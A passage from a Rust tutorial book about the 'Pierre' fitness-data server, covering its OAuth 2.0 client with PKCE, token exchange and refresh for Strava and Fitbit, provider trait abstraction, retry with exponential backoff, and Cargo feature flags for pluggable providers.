hasher.update(code_verifier.as_bytes());
let hash = hasher.finalize();
let code_challenge = URL_SAFE_NO_PAD.encode(hash);
Self {
code_verifier,
code_challenge,
code_challenge_method: "S256".into(),
}
}
}
}
PKCE generation steps:
- Generate verifier: Random 43-128 character string from allowed charset
- Hash verifier: SHA-256 hash of verifier bytes
- Base64url encode: URL-safe base64 encoding without padding
- Return params: Verifier (kept secret) and challenge (sent to provider)
Rust Idioms: Base64url Encoding
Source: src/oauth2_client/client.rs:9
#![allow(unused)]
fn main() {
use base64::{engine::general_purpose::URL_SAFE_NO_PAD, Engine as _};
}
Usage:
#![allow(unused)]
fn main() {
let code_challenge = URL_SAFE_NO_PAD.encode(hash);
}
Why URL_SAFE_NO_PAD:
- URL-safe: Uses
-and_instead of+and/(safe in query parameters) - No padding: Omits trailing
=characters (RFC 7636 requirement) - Standard compliant: Matches OAuth 2.0 PKCE specification
Authorization URL Construction
The client builds authorization URLs for user consent:
Source: src/oauth2_client/client.rs:149-177
#![allow(unused)]
fn main() {
/// Get authorization `URL` with `PKCE` support
///
/// # Errors
///
/// Returns an error if the authorization URL is malformed
pub fn get_authorization_url_with_pkce(
&self,
state: &str,
pkce: &PkceParams,
) -> Result<String> {
let mut url = Url::parse(&self.config.auth_url).context("Invalid auth URL")?;
let mut query_pairs = url.query_pairs_mut();
query_pairs
.append_pair("client_id", &self.config.client_id)
.append_pair("redirect_uri", &self.config.redirect_uri)
.append_pair("response_type", "code")
.append_pair("scope", &self.config.scopes.join(" "))
.append_pair("state", state);
if self.config.use_pkce {
query_pairs
.append_pair("code_challenge", &pkce.code_challenge)
.append_pair("code_challenge_method", &pkce.code_challenge_method);
}
drop(query_pairs);
Ok(url.to_string())
}
}
Generated URL example:
https://www.strava.com/oauth/authorize?
client_id=12345&
redirect_uri=http://localhost:8081/api/oauth/callback/strava&
response_type=code&
scope=activity:read_all%20profile:read&
state=abc123&
code_challenge=E9Melhoa2OwvFrEMTJguCHaoeK1t8URWbuGJSstw-cM&
code_challenge_method=S256
Query parameters:
response_type=code: Authorization code flowscope: Space-separated permissionsstate: CSRF protection tokencode_challenge/code_challenge_method: PKCE security
OAuth Token Structure
The client handles OAuth tokens with expiration tracking:
Source: src/oauth2_client/client.rs:72-101
#![allow(unused)]
fn main() {
/// OAuth 2.0 access token with expiration and refresh capabilities
#[derive(Debug, Clone, Serialize, Deserialize)]
pub struct OAuth2Token {
/// The access token string
pub access_token: String,
/// Token type (usually "Bearer")
pub token_type: String,
/// Expiration timestamp (UTC)
pub expires_at: Option<DateTime<Utc>>,
/// Optional refresh token for getting new access tokens
pub refresh_token: Option<String>,
/// Granted OAuth scopes
pub scope: Option<String>,
}
impl OAuth2Token {
/// Check if the token is expired
#[must_use]
pub fn is_expired(&self) -> bool {
self.expires_at
.is_some_and(|expires_at| expires_at <= Utc::now())
}
/// Check if the token will expire within 5 minutes
#[must_use]
pub fn will_expire_soon(&self) -> bool {
self.expires_at
.is_some_and(|expires_at| expires_at <= Utc::now() + Duration::minutes(5))
}
}
}
Expiration logic:
is_expired(): Token expired (Utc::now() >= expires_at)will_expire_soon(): Token expires within 5 minutes (proactive refresh)
Rust Idioms: Option::is_some_and
Source: src/oauth2_client/client.rs:90-93
#![allow(unused)]
fn main() {
pub fn is_expired(&self) -> bool {
self.expires_at
.is_some_and(|expires_at| expires_at <= Utc::now())
}
}
Idiom: Option::is_some_and(predicate) combines is_some() and predicate check in one operation.
Equivalent verbose code:
#![allow(unused)]
fn main() {
// Less idiomatic:
self.expires_at.is_some() && self.expires_at.unwrap() <= Utc::now()
// Idiomatic:
self.expires_at.is_some_and(|expires_at| expires_at <= Utc::now())
}
Benefits:
- No unwrap: Predicate only called if Some
- Concise: Single method call instead of chaining
- Clear intent: “check if some AND condition holds”
Token Exchange
The client exchanges authorization codes for access tokens:
Source: src/oauth2_client/client.rs:205-237
#![allow(unused)]
fn main() {
/// Exchange authorization code with `PKCE` support
///
/// # Errors
///
/// Returns an error if the token exchange request fails or response is invalid
pub async fn exchange_code_with_pkce(
&self,
code: &str,
pkce: &PkceParams,
) -> Result<OAuth2Token> {
let mut params = vec![
("client_id", self.config.client_id.as_str()),
("client_secret", self.config.client_secret.as_str()),
("code", code),
("grant_type", "authorization_code"),
("redirect_uri", self.config.redirect_uri.as_str()),
];
if self.config.use_pkce {
params.push(("code_verifier", &pkce.code_verifier));
}
let response: TokenResponse = self
.client
.post(&self.config.token_url)
.form(¶ms)
.send()
.await?
.json()
.await?;
Ok(Self::token_from_response(response))
}
}
Token exchange flow:
- Build form params: Client credentials, auth code, grant type, redirect URI
- Add PKCE verifier: Include
code_verifierif PKCE enabled - POST to token endpoint: Send form-encoded request
- Parse response: Extract access token, refresh token, expiration
- Return OAuth2Token: Structured token with expiration tracking
Token Refresh
The client refreshes expired tokens automatically:
Source: src/oauth2_client/client.rs:239-262 (conceptual)
#![allow(unused)]
fn main() {
/// Refresh an expired access token
///
/// # Errors
///
/// Returns an error if the token refresh request fails or response is invalid
pub async fn refresh_token(&self, refresh_token: &str) -> Result<OAuth2Token> {
let params = [
("client_id", self.config.client_id.as_str()),
("client_secret", self.config.client_secret.as_str()),
("refresh_token", refresh_token),
("grant_type", "refresh_token"),
];
let response: TokenResponse = self
.client
.post(&self.config.token_url)
.form(¶ms)
.send()
.await?
.json()
.await?;
Ok(Self::token_from_response(response))
}
}
Refresh flow:
- Use refresh token: Include
refresh_tokenfrom previous response - Grant type:
refresh_tokeninstead ofauthorization_code - New access token: Provider issues fresh access token
- Update storage: Replace old token in database
Provider-Specific Clients
Pierre includes specialized clients for Strava and Fitbit:
Strava token exchange (src/oauth2_client/client.rs:372-395):
#![allow(unused)]
fn main() {
/// Exchange Strava authorization code with `PKCE` support
pub async fn exchange_strava_code_with_pkce(
client_id: &str,
client_secret: &str,
code: &str,
redirect_uri: &str,
pkce: &PkceParams,
) -> Result<(OAuth2Token, serde_json::Value)> {
let params = [
("client_id", client_id),
("client_secret", client_secret),
("code", code),
("grant_type", "authorization_code"),
("code_verifier", &pkce.code_verifier),
];
let client = oauth_client();
let response: TokenResponse = client
.post("https://www.strava.com/oauth/token")
.form(¶ms)
.send()
.await?
.json()
.await?;
// Strava returns athlete data with token response
let token = OAuth2Client::token_from_response(response.clone());
let athlete = response.athlete.unwrap_or_default();
Ok((token, athlete))
}
}
Strava specifics:
- Athlete data: Strava returns athlete profile with token response
- Hardcoded endpoint:
https://www.strava.com/oauth/token - PKCE support: Strava supports code_verifier parameter
Fitbit token exchange (src/oauth2_client/client.rs:522-545):
#![allow(unused)]
fn main() {
/// Exchange Fitbit authorization code with `PKCE` support
pub async fn exchange_fitbit_code_with_pkce(
client_id: &str,
client_secret: &str,
code: &str,
redirect_uri: &str,
pkce: &PkceParams,
) -> Result<(OAuth2Token, serde_json::Value)> {
let params = [
("client_id", client_id),
("client_secret", client_secret),
("code", code),
("grant_type", "authorization_code"),
("redirect_uri", redirect_uri),
("code_verifier", &pkce.code_verifier),
];
let client = oauth_client();
let response: TokenResponse = client
.post("https://api.fitbit.com/oauth2/token")
.form(¶ms)
.send()
.await?
.json()
.await?;
let token = OAuth2Client::token_from_response(response);
Ok((token, serde_json::json!({})))
}
}
Fitbit specifics:
- Redirect URI required: Fitbit validates redirect_uri in token request
- No user data: Fitbit doesn’t return user profile with token response
- Hardcoded endpoint:
https://api.fitbit.com/oauth2/token
Tenant-Aware OAuth Client
Pierre wraps the generic OAuth client with tenant-specific rate limiting:
Source: src/tenant/oauth_client.rs:36-49
#![allow(unused)]
fn main() {
/// Tenant-aware OAuth client with credential isolation and rate limiting
pub struct TenantOAuthClient {
/// Shared OAuth manager instance for handling tenant-specific OAuth operations
pub oauth_manager: Arc<Mutex<TenantOAuthManager>>,
}
impl TenantOAuthClient {
/// Create new tenant OAuth client with provided manager
#[must_use]
pub fn new(oauth_manager: TenantOAuthManager) -> Self {
Self {
oauth_manager: Arc::new(Mutex::new(oauth_manager)),
}
}
}
}
Get OAuth client with rate limiting:
Source: src/tenant/oauth_client.rs:59-93
#![allow(unused)]
fn main() {
/// Get `OAuth2Client` configured for specific tenant and provider
///
/// # Errors
///
/// Returns an error if:
/// - Tenant exceeds daily rate limit for the provider
/// - No OAuth credentials configured for tenant and provider
/// - OAuth configuration creation fails
pub async fn get_oauth_client(
&self,
tenant_context: &TenantContext,
provider: &str,
database: &Database,
) -> Result<OAuth2Client> {
// Check rate limit first
let manager = self.oauth_manager.lock().await;
let (current_usage, daily_limit) =
manager.check_rate_limit(tenant_context.tenant_id, provider)?;
if current_usage >= daily_limit {
return Err(AppError::invalid_input(format!(
"Tenant {} has exceeded daily rate limit for provider {}: {}/{}",
tenant_context.tenant_id, provider, current_usage, daily_limit
))
.into());
}
// Get tenant credentials
let credentials = manager
.get_credentials(tenant_context.tenant_id, provider, database)
.await?;
drop(manager);
// Build OAuth2Config from tenant credentials
let oauth_config = Self::build_oauth_config(&credentials, provider)?;
Ok(OAuth2Client::new(oauth_config))
}
}
Tenant isolation:
- Rate limit check: Enforce daily API call limits per tenant
- Credential lookup: Tenant-specific OAuth app credentials
- OAuth client creation: Generic client with tenant configuration
- Usage tracking: Increment counter after successful operations
OAuth Flow Integration
Providers use the tenant-aware OAuth client for authentication:
Strava provider integration (src/providers/strava.rs:220-237):
#![allow(unused)]
fn main() {
pub async fn exchange_code_with_pkce(
&mut self,
code: &str,
redirect_uri: &str,
pkce: &crate::oauth2_client::PkceParams,
) -> Result<(String, String)> {
let credentials = self.oauth_manager.get_credentials(...).await?;
let (token, athlete) = crate::oauth2_client::strava::exchange_strava_code_with_pkce(
&credentials.client_id,
&credentials.client_secret,
code,
redirect_uri,
pkce,
)
.await?;
// Store token in database
self.store_token(&token).await?;
Ok((token.access_token, athlete["id"].as_str().unwrap_or_default().to_owned()))
}
}
Integration steps:
- Get credentials: Tenant-specific OAuth app credentials from manager
- Exchange code: Call provider-specific token exchange function
- Store token: Save access token and refresh token to database
- Return result: Access token and user ID for subsequent API calls
Key Takeaways
-
Generic OAuth client: Single
OAuth2Clientimplementation works with all providers. -
PKCE mandatory: All OAuth flows use SHA-256 PKCE for security.
-
Provider specifics: Strava/Fitbit have different response formats and endpoint URLs.
-
Token expiration:
will_expire_soon()enables proactive token refresh (5-minute buffer). -
Tenant isolation: Each tenant has separate OAuth credentials and rate limits.
-
Rate limiting: Daily API call limits prevent tenant abuse of provider APIs.
-
Refresh tokens: Long-lived refresh tokens avoid repeated user authorization.
-
Base64url encoding: URL-safe base64 without padding matches OAuth 2.0 spec.
-
Option::is_some_and: Idiomatic Rust for conditional checks on Option values.
-
Credential fallback: Tenant-specific credentials with server-level fallback for flexibility.
Next Chapter: Chapter 17: Provider Data Models & Rate Limiting - Learn how Pierre abstracts fitness provider APIs with unified interfaces and handles rate limiting across multiple providers.
Chapter 17: Provider Data Models & Rate Limiting
This chapter explores how Pierre abstracts fitness provider APIs through unified interfaces and handles rate limiting across multiple providers. You’ll learn about trait-based provider abstraction, provider-agnostic data models, retry logic, and tenant-aware provider wrappers.
Provider Abstraction Architecture
Pierre uses a trait-based approach to abstract fitness provider differences:
┌──────────────────────────────────────────────────────────┐
│ FitnessProvider Trait │
│ (Unified interface for all fitness data providers) │
└──────────────────────────────────────────────────────────┘
│
┌───────────────────┼───────────────────┐
│ │ │
▼ ▼ ▼
┌──────────────┐ ┌──────────────┐ ┌──────────────┐
│ Strava │ │ Fitbit │ │ Garmin │
│ Provider │ │ Provider │ │ Provider │
└──────────────┘ └──────────────┘ └──────────────┘
│ │ │
▼ ▼ ▼
┌──────────────┐ ┌──────────────┐ ┌──────────────┐
│ Strava API │ │ Fitbit API │ │ Garmin API │
│ (REST/JSON) │ │ (REST/JSON) │ │ (REST/JSON) │
└──────────────┘ └──────────────┘ └──────────────┘
Key benefit: Pierre tools call FitnessProvider methods without knowing which provider implementation they’re using.
Fitnessprovider Trait
The trait defines a uniform interface for all fitness providers:
Source: src/providers/core.rs:52-171
#![allow(unused)]
fn main() {
/// Core fitness data provider trait - single interface for all providers
#[async_trait]
pub trait FitnessProvider: Send + Sync {
/// Get provider name (e.g., "strava", "fitbit")
fn name(&self) -> &'static str;
/// Get provider configuration
fn config(&self) -> &ProviderConfig;
/// Set `OAuth2` credentials for this provider
async fn set_credentials(&self, credentials: OAuth2Credentials) -> Result<()>;
/// Check if provider has valid authentication
async fn is_authenticated(&self) -> bool;
/// Refresh access token if needed
async fn refresh_token_if_needed(&self) -> Result<()>;
/// Get user's athlete profile
async fn get_athlete(&self) -> Result<Athlete>;
/// Get user's activities with offset-based pagination (legacy)
async fn get_activities(
&self,
limit: Option<usize>,
offset: Option<usize>,
) -> Result<Vec<Activity>>;
/// Get user's activities with cursor-based pagination (recommended)
///
/// This method provides efficient, consistent pagination using opaque cursors.
/// Cursors prevent duplicates and missing items when data changes during pagination.
async fn get_activities_cursor(
&self,
params: &PaginationParams,
) -> Result<CursorPage<Activity>>;
/// Get specific activity by ID
async fn get_activity(&self, id: &str) -> Result<Activity>;
/// Get user's aggregate statistics
async fn get_stats(&self) -> Result<Stats>;
/// Get user's personal records
async fn get_personal_records(&self) -> Result<Vec<PersonalRecord>>;
/// Get sleep sessions for a date range
///
/// Returns sleep data from providers that support sleep tracking (Fitbit, Garmin).
/// Providers without sleep data support return `UnsupportedFeature` error.
async fn get_sleep_sessions(
&self,
start_date: DateTime<Utc>,
end_date: DateTime<Utc>,
) -> Result<Vec<SleepSession>, ProviderError> {
let date_range = format!(
"{} to {}",
start_date.format("%Y-%m-%d"),
end_date.format("%Y-%m-%d")
);
Err(ProviderError::UnsupportedFeature {
provider: self.name().to_owned(),
feature: format!("sleep_sessions (requested: {date_range})"),
})
}
/// Revoke access tokens (disconnect)
async fn disconnect(&self) -> Result<()>;
}
}
Trait design:
- #[async_trait]: Required for async methods in traits (trait desugaring for async)
- Send + Sync: Required for sharing across threads in async Rust
- Default implementations: Optional methods like
get_sleep_sessionshave defaults that returnUnsupportedFeature
Rust Idioms: Async Trait
Source: src/providers/core.rs:53
#![allow(unused)]
fn main() {
#[async_trait]
pub trait FitnessProvider: Send + Sync {
async fn get_athlete(&self) -> Result<Athlete>;
// ... other async methods
}
}
Why async_trait:
- Trait async limitation: Rust doesn’t natively support
async fnin traits (as of Rust 1.75) - Macro expansion:
#[async_trait]macro transforms async methods intoPin<Box<dyn Future>> - Send + Sync: Required for async traits to ensure thread safety across await points
Expanded version (conceptual):
#![allow(unused)]
fn main() {
trait FitnessProvider: Send + Sync {
fn get_athlete(&self) -> Pin<Box<dyn Future<Output = Result<Athlete>> + Send + '_>>;
}
}
Provider-Agnostic Data Models
Pierre defines unified data models that work across all providers:
Activity model (src/models.rs:246-350 - conceptual):
#![allow(unused)]
fn main() {
/// Represents a single fitness activity from any provider
#[derive(Debug, Clone, Serialize, Deserialize)]
pub struct Activity {
/// Unique identifier (provider-specific)
pub id: String,
/// Activity name/title
pub name: String,
/// Sport type (run, ride, swim, etc.)
pub sport_type: SportType,
/// Activity distance in meters
pub distance: Option<f64>,
/// Total duration in seconds
pub duration: Option<u64>,
/// Moving time in seconds (excludes rest/stops)
pub moving_time: Option<u64>,
/// Total elevation gain in meters
pub total_elevation_gain: Option<f64>,
/// Activity start time (UTC)
pub start_date: DateTime<Utc>,
/// Average speed in m/s
pub average_speed: Option<f32>,
/// Average heart rate in BPM
pub average_heartrate: Option<u32>,
/// Maximum heart rate in BPM
pub max_heartrate: Option<u32>,
/// Average power in watts (cycling)
pub average_watts: Option<u32>,
/// Total energy in kilojoules
pub kilojoules: Option<f32>,
/// Calories burned
pub calories: Option<u32>,
/// Whether activity used a trainer/treadmill
pub trainer: Option<bool>,
/// GPS route polyline (encoded)
pub map: Option<ActivityMap>,
// ... 30+ more optional fields
}
}
Design principles:
- Provider-agnostic: Fields common across all providers (id, name, distance, etc.)
- Optional fields: Use
Option<T>for provider-specific or missing data - Normalized units: Standardize on meters, seconds, BPM (not provider-specific units)
- Extensible: New providers can omit fields they don’t support
Athlete model (src/models.rs:400-450 - conceptual):
#![allow(unused)]
fn main() {
/// Athlete profile information
#[derive(Debug, Clone, Serialize, Deserialize)]
pub struct Athlete {
pub id: String,
pub username: Option<String>,
pub firstname: Option<String>,
pub lastname: Option<String>,
pub city: Option<String>,
pub state: Option<String>,
pub country: Option<String>,
pub sex: Option<String>,
pub weight: Option<f32>,
pub profile_medium: Option<String>,
pub profile: Option<String>,
pub ftp: Option<u32>, // Functional Threshold Power (cycling)
// ... provider-specific fields
}
}
Provider Error Types
Pierre defines structured errors with retry information:
Source: src/providers/errors.rs:10-101
#![allow(unused)]
fn main() {
/// Provider operation errors with structured context
#[derive(Error, Debug)]
pub enum ProviderError {
/// Provider API is unavailable or returning errors
#[error("Provider {provider} API error: {status_code} - {message}")]
ApiError {
/// Name of the fitness provider (e.g., "strava", "garmin")
provider: String,
/// HTTP status code from the provider
status_code: u16,
/// Error message from the provider
message: String,
/// Whether this error can be retried
retryable: bool,
},
/// Rate limit exceeded with retry information
#[error("Rate limit exceeded for {provider}: retry after {retry_after_secs} seconds")]
RateLimitExceeded {
/// Name of the fitness provider
provider: String,
/// Seconds to wait before retrying
retry_after_secs: u64,
/// Type of rate limit hit (e.g., "15-minute", "daily")
limit_type: String,
},
/// Authentication failed or token expired
#[error("Authentication failed for {provider}: {reason}")]
AuthenticationFailed {
/// Name of the fitness provider
provider: String,
/// Reason for authentication failure
reason: String,
},
/// Resource not found
#[error("{resource_type} '{resource_id}' not found in {provider}")]
NotFound {
provider: String,
resource_type: String,
resource_id: String,
},
/// Feature not supported by provider
#[error("Provider {provider} does not support {feature}")]
UnsupportedFeature {
provider: String,
feature: String,
},
// ... more error variants
}
}
Structured errors:
- thiserror: Generates
Errortrait implementation with#[error]messages - Named fields: Structured data (provider, status_code, retry_after_secs)
- Display message:
#[error(...)]macro generates user-friendly error messages
Retry logic:
Source: src/providers/errors.rs:104-130
#![allow(unused)]
fn main() {
impl ProviderError {
/// Check if error is retryable
#[must_use]
pub const fn is_retryable(&self) -> bool {
match self {
Self::ApiError { retryable, .. } => *retryable,
Self::RateLimitExceeded { .. } | Self::NetworkError(_) => true,
Self::AuthenticationFailed { .. }
| Self::TokenRefreshFailed { .. }
| Self::NotFound { .. }
| Self::InvalidData { .. }
| Self::ConfigurationError { .. }
| Self::UnsupportedFeature { .. }
| Self::Other(_) => false,
}
}
/// Get retry delay in seconds if applicable
#[must_use]
pub const fn retry_after_secs(&self) -> Option<u64> {
match self {
Self::RateLimitExceeded {
retry_after_secs, ..
} => Some(*retry_after_secs),
_ => None,
}
}
}
}
Retryable errors: Rate limits and network errors can be retried; authentication failures and not-found errors cannot.
Retry Logic with Exponential Backoff
Pierre implements automatic retry with exponential backoff for rate limits:
Source: src/providers/utils.rs:17-39
#![allow(unused)]
fn main() {
/// Configuration for retry behavior
#[derive(Debug, Clone)]
pub struct RetryConfig {
/// Maximum number of retry attempts
pub max_retries: u32,
/// Initial backoff delay in milliseconds
pub initial_backoff_ms: u64,
/// HTTP status codes that should trigger retries
pub retryable_status_codes: Vec<StatusCode>,
/// Estimated block duration for user-facing error messages (seconds)
pub estimated_block_duration_secs: u64,
}
impl Default for RetryConfig {
fn default() -> Self {
Self {
max_retries: 3,
initial_backoff_ms: 1000,
retryable_status_codes: vec![StatusCode::TOO_MANY_REQUESTS],
estimated_block_duration_secs: 3600, // 1 hour
}
}
}
}
Retry implementation:
Source: src/providers/utils.rs:97-175
#![allow(unused)]
fn main() {
/// Make an authenticated HTTP GET request with retry logic
pub async fn api_request_with_retry<T>(
client: &Client,
url: &str,
access_token: &str,
provider_name: &str,
retry_config: &RetryConfig,
) -> Result<T>
where
T: for<'de> Deserialize<'de>,
{
tracing::info!("Starting {provider_name} API request to: {url}");
let mut attempt = 0;
loop {
let response = client
.get(url)
.header("Authorization", format!("Bearer {access_token}"))
.send()
.await
.with_context(|| format!("Failed to send request to {provider_name} API"))?;
let status = response.status();
tracing::info!("Received HTTP response with status: {status}");
if retry_config.retryable_status_codes.contains(&status) {
attempt += 1;
if attempt >= retry_config.max_retries {
let max_retries = retry_config.max_retries;
warn!(
"{provider_name} API rate limit exceeded - max retries ({max_retries}) reached"
);
let minutes = retry_config.estimated_block_duration_secs / 60;
let status_code = status.as_u16();
return Err(ProviderError::RateLimitExceeded {
provider: provider_name.to_owned(),
retry_after_secs: retry_config.estimated_block_duration_secs,
limit_type: format!(
"API rate limit ({status_code}) - max retries reached - wait ~{minutes} minutes"
),
}.into());
}
let backoff_ms = retry_config.initial_backoff_ms * 2_u64.pow(attempt - 1);
let max_retries = retry_config.max_retries;
let status_code = status.as_u16();
warn!(
"{provider_name} API rate limit hit ({status_code}) - retry {attempt}/{max_retries} after {backoff_ms}ms backoff"
);
tokio::time::sleep(Duration::from_millis(backoff_ms)).await;
continue;
}
if !status.is_success() {
let text = response.text().await.unwrap_or_default();
return Err(ProviderError::ApiError {
provider: provider_name.to_owned(),
status_code: status.as_u16(),
message: format!("{provider_name} API request failed with status {status}: {text}"),
retryable: false,
}
.into());
}
return response
.json()
.await
.with_context(|| format!("Failed to parse {provider_name} API response"));
}
}
}
Exponential backoff:
Attempt 1: initial_backoff_ms * 2^0 = 1000ms (1 second)
Attempt 2: initial_backoff_ms * 2^1 = 2000ms (2 seconds)
Attempt 3: initial_backoff_ms * 2^2 = 4000ms (4 seconds)
Why exponential backoff: Prevents thundering herd problem where all clients retry simultaneously.
Rust Idioms: Hrtb for Generic Deserialize
Source: src/providers/utils.rs:104-105
#![allow(unused)]
fn main() {
where
T: for<'de> Deserialize<'de>,
}
HRTB (Higher-Ranked Trait Bound):
for<'de>: TypeTmust implementDeserializefor any lifetime'de- Needed for serde:
Deserializehas a lifetime parameter for borrowed data - Generic deserialization: Allows function to return any deserializable type
Without HRTB (doesn’t compile):
#![allow(unused)]
fn main() {
where
T: Deserialize<'static>, // Too restrictive - only works for 'static lifetime
}
Type Conversion Utilities
Providers return float values that need safe conversion to integers:
Source: src/providers/utils.rs:42-86
#![allow(unused)]
fn main() {
/// Type conversion utilities for safe float-to-integer conversions
pub mod conversions {
use num_traits::ToPrimitive;
/// Safely convert f64 to u64, clamping to valid range
/// Used for duration values from APIs that return floats
#[must_use]
pub fn f64_to_u64(value: f64) -> u64 {
if !value.is_finite() {
return 0;
}
let t = value.trunc();
if t.is_sign_negative() {
return 0;
}
t.to_u64().map_or(u64::MAX, |v| v)
}
/// Safely convert f32 to u32, clamping to valid range
/// Used for metrics like heart rate, power, cadence
#[must_use]
pub fn f32_to_u32(value: f32) -> u32 {
if !value.is_finite() {
return 0;
}
let t = value.trunc();
if t.is_sign_negative() {
return 0;
}
t.to_u32().map_or(u32::MAX, |v| v)
}
/// Safely convert f64 to u32, clamping to valid range
/// Used for calorie values and other metrics
#[must_use]
pub fn f64_to_u32(value: f64) -> u32 {
if !value.is_finite() {
return 0;
}
let t = value.trunc();
if t.is_sign_negative() {
return 0;
}
t.to_u32().map_or(u32::MAX, |v| v)
}
}
}
Safety checks:
- is_finite(): Reject NaN and infinity
- is_sign_negative(): Reject negative values (durations/HR/power can’t be negative)
- trunc(): Remove fractional part before conversion
- map_or(): Clamp to max value if conversion overflows
Usage example:
#![allow(unused)]
fn main() {
let duration_secs: f64 = activity_json["duration"].as_f64().unwrap_or(0.0);
let duration: u64 = conversions::f64_to_u64(duration_secs);
}
Tenant-Aware Provider Wrapper
Pierre wraps providers with tenant context for isolation:
Source: src/providers/core.rs:182-211
#![allow(unused)]
fn main() {
/// Tenant-aware provider wrapper that handles multi-tenancy
pub struct TenantProvider {
inner: Box<dyn FitnessProvider>,
tenant_id: Uuid,
user_id: Uuid,
}
impl TenantProvider {
/// Create a new tenant-aware provider
#[must_use]
pub fn new(inner: Box<dyn FitnessProvider>, tenant_id: Uuid, user_id: Uuid) -> Self {
Self {
inner,
tenant_id,
user_id,
}
}
/// Get tenant ID
#[must_use]
pub const fn tenant_id(&self) -> Uuid {
self.tenant_id
}
/// Get user ID
#[must_use]
pub const fn user_id(&self) -> Uuid {
self.user_id
}
}
}
Delegation pattern:
Source: src/providers/core.rs:213-276
#![allow(unused)]
fn main() {
#[async_trait]
impl FitnessProvider for TenantProvider {
fn name(&self) -> &'static str {
self.inner.name()
}
async fn set_credentials(&self, credentials: OAuth2Credentials) -> Result<()> {
// Add tenant-specific logging/metrics here
tracing::info!(
"Setting credentials for provider {} in tenant {} for user {}",
self.name(),
self.tenant_id,
self.user_id
);
self.inner.set_credentials(credentials).await
}
async fn get_athlete(&self) -> Result<Athlete> {
self.inner.get_athlete().await
}
// ... delegate all other methods to inner
}
}
Wrapper benefits:
- Logging: Tenant/user context in all log messages
- Metrics: Track usage per tenant/user
- Isolation: Prevent cross-tenant data leaks
- Transparent: Tools don’t know they’re using wrapped provider
Cursor-Based Pagination
Pierre supports cursor-based pagination for efficient data access:
Conceptual implementation:
#![allow(unused)]
fn main() {
pub struct PaginationParams {
pub limit: Option<usize>,
pub cursor: Option<String>,
}
pub struct CursorPage<T> {
pub items: Vec<T>,
pub next_cursor: Option<String>,
pub has_more: bool,
}
}
Cursor vs offset pagination:
| Offset-based | Cursor-based |
|---|---|
?limit=10&offset=20 | ?limit=10&cursor=abc123 |
| Can miss items if data changes | Consistent even if data changes |
| Simple to implement | Requires opaque cursor generation |
| Slow for large offsets | Fast for any cursor position |
Why cursors:
- Consistency: Prevent duplicate/missing items when data inserted during pagination
- Performance: Database can seek to cursor position efficiently
- Provider support: Strava, Fitbit, Garmin all support cursor pagination
Key Takeaways
-
Trait-based abstraction:
FitnessProvidertrait unifies all provider implementations. -
async_trait: Required for async methods in traits (Rust limitation workaround).
-
Send + Sync: Required for sharing trait objects across async tasks/threads.
-
Provider-agnostic models: Unified
Activity,Athlete,Statstypes work across all providers. -
Structured errors:
ProviderErrorwith named fields and retry information. -
Exponential backoff:
2^attempt * initial_backoff_msprevents thundering herd. -
Type conversion: Safe float-to-integer conversion handles NaN, infinity, negative values.
-
HRTB:
for<'de> Deserialize<'de>allows generic deserialization with any lifetime. -
Tenant wrapper:
TenantProvideradds tenant/user context without changing trait interface. -
Cursor pagination: More reliable than offset pagination for dynamic data.
-
Default trait methods: Optional provider features (sleep, recovery) have default “unsupported” implementations.
-
Retry config: Configurable retry attempts, backoff, and status codes per provider.
Next Chapter: Chapter 18: A2A Protocol - Agent-to-Agent Communication - Learn how Pierre implements the Agent-to-Agent (A2A) protocol for secure inter-agent communication with Ed25519 signatures.
Chapter 17.5: Pluggable Provider Architecture
This chapter explores pierre’s pluggable provider architecture that enables runtime registration of 1 to x fitness providers simultaneously. You’ll learn about provider factories, dynamic discovery, environment-based configuration, and how to add new providers without modifying existing code.
Pluggable Architecture Overview
Pierre implements a fully pluggable provider system where fitness providers are registered at runtime through a factory pattern. The system supports 1 to x providers simultaneously, meaning you can use just Strava, or Strava + Garmin + Fitbit + custom providers all at once.
┌────────────────────────────────────────────────────────────────────────────────────┐
│ ProviderRegistry (runtime) │
│ Manages 1 to x providers with dynamic discovery │
└───────────┬────────────────────────────────────────────────────────────────────────┘
│
┌────────┴────────┬───────────┬────────────┬──────────┬────────┬─────────┬─────────────┐
│ │ │ │ │ │ │ │
▼ ▼ ▼ ▼ ▼ ▼ ▼ ▼
┌─────────┐ ┌─────────┐ ┌─────────┐ ┌─────────┐ ┌───────┐ ┌───────┐ ┌─────────┐ ┌─────────┐
│ Strava │ │ Garmin │ │ Terra │ │ Fitbit │ │ WHOOP │ │ COROS │ │Synthetic│ │ Custom │
│ Factory │ │ Factory │ │ Factory │ │ Factory │ │Factory│ │Factory│ │ Factory │ │ Factory │
└────┬────┘ └────┬────┘ └────┬────┘ └────┬────┘ └───┬───┘ └───┬───┘ └────┬────┘ └────┬────┘
│ │ │ │ │ │ │ │
▼ ▼ ▼ ▼ ▼ ▼ ▼ ▼
┌─────────┐ ┌─────────┐ ┌─────────┐ ┌─────────┐ ┌───────┐ ┌───────┐ ┌─────────┐ ┌─────────┐
│ Strava │ │ Garmin │ │ Terra │ │ Fitbit │ │ WHOOP │ │ COROS │ │Synthetic│ │ Custom │
│Provider │ │Provider │ │Provider │ │Provider │ │Provdr │ │Provdr │ │Provider │ │Provider │
└─────────┘ └─────────┘ └─────────┘ └─────────┘ └───────┘ └───────┘ └─────────┘ └─────────┘
│ │ │ │ │ │ │ │
└─────────────┴───────────┴────────────┴───────────┴─────────┴──────────┴────────────┘
│
▼
┌──────────────────────────┐
│ FitnessProvider Trait │
│ (shared interface) │
└──────────────────────────┘
Key benefit: Add, remove, or swap providers without modifying tool code, connection handlers, or application logic.
Feature Flags (compile-Time Selection)
Pierre uses Cargo feature flags for compile-time provider selection. This allows minimal binaries with only the providers you need:
Source: Cargo.toml
# Provider feature flags - enable/disable individual fitness data providers
provider-strava = []
provider-garmin = []
provider-terra = []
provider-fitbit = []
provider-whoop = []
provider-coros = []
provider-synthetic = []
all-providers = ["provider-strava", "provider-garmin", "provider-terra", "provider-fitbit", "provider-whoop", "provider-coros", "provider-synthetic"]
Build with specific providers:
# All providers (default)
cargo build --release
# Only Strava
cargo build --release --no-default-features --features "sqlite,provider-strava"
# Strava + Garmin (no synthetic)
cargo build --release --no-default-features --features "sqlite,provider-strava,provider-garmin"
Conditional compilation in code:
#![allow(unused)]
fn main() {
// Provider modules conditionally compiled
#[cfg(feature = "provider-strava")]
pub mod strava_provider;
#[cfg(feature = "provider-garmin")]
pub mod garmin_provider;
#[cfg(feature = "provider-whoop")]
pub mod whoop_provider;
#[cfg(feature = "provider-coros")]
pub mod coros_provider;
#[cfg(feature = "provider-synthetic")]
pub mod synthetic_provider;
}
